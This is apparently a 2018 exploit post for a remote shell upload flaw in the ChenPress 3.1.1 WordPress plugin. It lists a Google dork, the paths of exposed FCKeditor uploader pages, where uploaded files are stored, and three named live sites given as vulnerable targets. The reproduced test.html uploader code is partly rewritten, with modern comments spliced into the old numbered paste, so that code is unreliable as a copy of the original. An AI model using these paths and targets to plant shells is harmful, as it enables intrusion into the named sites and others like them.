KingSkrupellos

WordPress ChenPress Plugins 3.1.1 Remote Shell Upload Vuln

Dec 19th, 2018
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress ChenPress Plugins 3.1.1 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 20/12/2018
  6. # Vendor Homepage : wordpress.org ~ groups-beta.google.com/group/ChenPress
  7. # Software Download Link : groups.google.com/group/ChenPress/attach/de5f7cc401d8c608/chenpress_3.1.1.zip?part=2
  8. # Script Owner Email : [email protected] ~ W. Chen
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : 3.1.1
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/plugins/chenpress/''
  14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  15. + CWE-434: Unrestricted Upload of File with Dangerous Type
  16. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
  17.  
  18. #################################################################################################
  19.  
  20. # Exploit :
  21.  
  22. /wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html
  23.  
  24. /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/upload/test.html
  25.  
  26. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html
  27.  
  28. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
  29.  
  30. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/connectors/test.html
  31.  
  32. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/frmupload.html
  33.  
  34. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/frmupload.html
  35.  
  36. # Directory File Path :
  37.  
  38. /wp-content/plugins/chenpress/UserFiles/File/.....
  39.  
  40. /wp-content/uploads/.....
  41.  
  42. /wp-content/uploads/[YEAR]/[MONTH]/.....
  43.  
  44. #################################################################################################
  45.  
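  46. Vulnerable File Code : /test.html (FCKeditor's bundled uploader test page. It is only a client-side form that posts the selected file to the chosen server-side connector — asp/upload.asp, aspx/upload.aspx or php/upload.php — so the file-type and access checks that CWE-434 / CWE-264 refer to have to be enforced in that connector, not in this HTML.)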
  47.  
  48. <!--
  49. * FCKeditor - The text editor for internet
  50. * Copyright (C) 2003-2005 Frederico Caldeira Knabben
  51. *
  52. * Licensed under the terms of the GNU Lesser General Public License:
  53. * http://www.opensource.org/licenses/lgpl-license.php
  54. *
  55. * For further information visit:
  56. * http://www.fckeditor.net/
  57. *
  58. * "Support Open Source software. What about a donation today?"
  59. *
  60. * File Name: test.html
  61. * Test page for the "File Uploaders".
  62. *
  63. * File Authors:
  64. * Frederico Caldeira Knabben ([email protected])
  65. -->
  66. <html>
  67. <head>
  68. <title>FCKeditor - Uploaders Tests</title>
  69. <script language="javascript">
  70.  
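/**
 * Posts the file chosen in the upload form to the selected uploader connector.
 *
 * The connector URL is read from the "cmbUploaderUrl" drop-down; when that
 * value is empty (the "(Custom)" entry) the "txtCustomUrl" text box is used
 * instead. If no URL is available the user is alerted and nothing is sent.
 *
 * Side effects: shows the target URL in the "eURL" span, clears "txtUrl",
 * sets the action of "frmUpload" and submits it.
 *
 * NOTE(review): this function only builds and submits the request. Nothing
 * here limits which file is sent, so any file-type or permission check has
 * to be enforced by the server-side connector that receives the POST.
 */
function SendFile()
{
	// Look the elements up by id instead of relying on implicit window.<id> globals.
	var oUploaderList	= document.getElementById( 'cmbUploaderUrl' ) ;
	var oCustomUrl		= document.getElementById( 'txtCustomUrl' ) ;
	var oPostUrlLabel	= document.getElementById( 'eURL' ) ;
	var oResultUrl		= document.getElementById( 'txtUrl' ) ;
	var oUploadForm		= document.getElementById( 'frmUpload' ) ;

	var sUploaderUrl = oUploaderList.value ;

	// Empty drop-down value means "(Custom)": fall back to the free-text URL.
	if ( sUploaderUrl.length === 0 )
		sUploaderUrl = oCustomUrl.value ;

	if ( sUploaderUrl.length === 0 )
	{
		alert( 'Please provide your custom URL or select a default one' ) ;
		return ;
	}

	// The custom URL is user-typed text. Assign it as text, not as innerHTML,
	// so that any markup in it is displayed literally and never parsed.
	oPostUrlLabel.textContent = sUploaderUrl ;
	oResultUrl.value = '' ;

	oUploadForm.action = sUploaderUrl ;
	oUploadForm.submit() ;
}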
  90.  
/**
 * Callback that reports the outcome of an upload to the user.
 *
 * @param {number} errorNumber - Result code: 0 success, 1 custom error,
 *   10 custom warning, 201 file renamed, 202 invalid file, 203 security
 *   error; any other value is reported as a generic failure.
 * @param {string} fileUrl - URL of the stored file; copied into "txtUrl"
 *   for codes 0, 10 and 201 only.
 * @param {string} fileName - Name the file was saved under (shown for 201).
 * @param {string} customMsg - Message shown as-is for codes 1 and 10.
 */
function OnUploadCompleted( errorNumber, fileUrl, fileName, customMsg )
{
	// Only these outcomes carry a usable file URL. Strict comparison keeps the
	// matching rules of a switch statement (no type coercion).
	var bHasFileUrl = ( errorNumber === 0 || errorNumber === 10 || errorNumber === 201 ) ;

	if ( bHasFileUrl )
		txtUrl.value = fileUrl ;

	var sMessage ;

	if ( errorNumber === 0 )
		sMessage = 'File uploaded with no errors' ;
	else if ( errorNumber === 1 || errorNumber === 10 )
		sMessage = customMsg ;
	else if ( errorNumber === 201 )
		sMessage = 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ;
	else if ( errorNumber === 202 )
		sMessage = 'Invalid file' ;
	else if ( errorNumber === 203 )
		sMessage = "Security error. You probably don't have enough permissions to upload. Please check your server." ;
	else
		sMessage = 'Error on file upload. Error number: ' + errorNumber ;

	alert( sMessage ) ;
}
  121.  
  122. </script>
  123. </head>
  124. <body>
  125. <table cellSpacing="0" cellPadding="0" width="100%" border="0" height="100%">
  126. <tr>
  127. <td>
  128. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  129. <tr>
  130. <td nowrap>
  131. Select the "File Uploader" to use:<br>
  132. <select id="cmbUploaderUrl" name="Select1">
  133. <option selected value="asp/upload.asp">ASP</option>
  134. <option value="aspx/upload.aspx">ASP.Net</option>
  135. <option value="php/upload.php">PHP</option>
  136. <option value="">(Custom)</option>
  137. </select>
  138. </td>
  139. <td nowrap>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  140. <td width="100%">
  141. Custom Uploader URL:<BR>
  142. <input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled type="text">
  143. </td>
  144. </tr>
  145. </table>
  146. <br>
  147. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  148. <tr>
  149. <td noWrap>
  150. <form id="frmUpload" target="UploadWindow" enctype="multipart/form-data" action="" method="post">
  151. Upload a new file:<br>
  152. <input type="file" name="NewFile"><br>
  153. <input type="button" value="Send it to the Server" onclick="SendFile();">
  154. </form>
  155. </td>
  156. <td style="WIDTH: 16px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  157. <td vAlign="top" width="100%">
  158. Uploaded File URL:<br>
  159. <INPUT id="txtUrl" style="WIDTH: 100%" readonly type="text">
  160. </td>
  161. </tr>
  162. </table>
  163. <br>
  164. Post URL: <span id="eURL">&nbsp;</span>
  165. </td>
  166. </tr>
  167. <tr>
  168. <td height="100%">
  169. <iframe name="UploadWindow" width="100%" height="100%" src="../../fckblank.html"></iframe>
  170. </td>
  171. </tr>
  172. </table>
  173. </body>
  174. </html>
  175.  
  176. #################################################################################################
  177.  
  178. # Example Vulnerable Sites =>
  179.  
  180. [+] citizennetmom.com/wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html
  181.  
  182. [+] arqueixal.com/blog/wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html
  183.  
  184. [+] ftp.unicauca.edu.co/cuentas/.cuentasbajadas29092009/comunicacionsocial/wp-content/plugins/
  185. chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
  186.  
  187. #################################################################################################
  188.  
  189. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  190.  
  191. #################################################################################################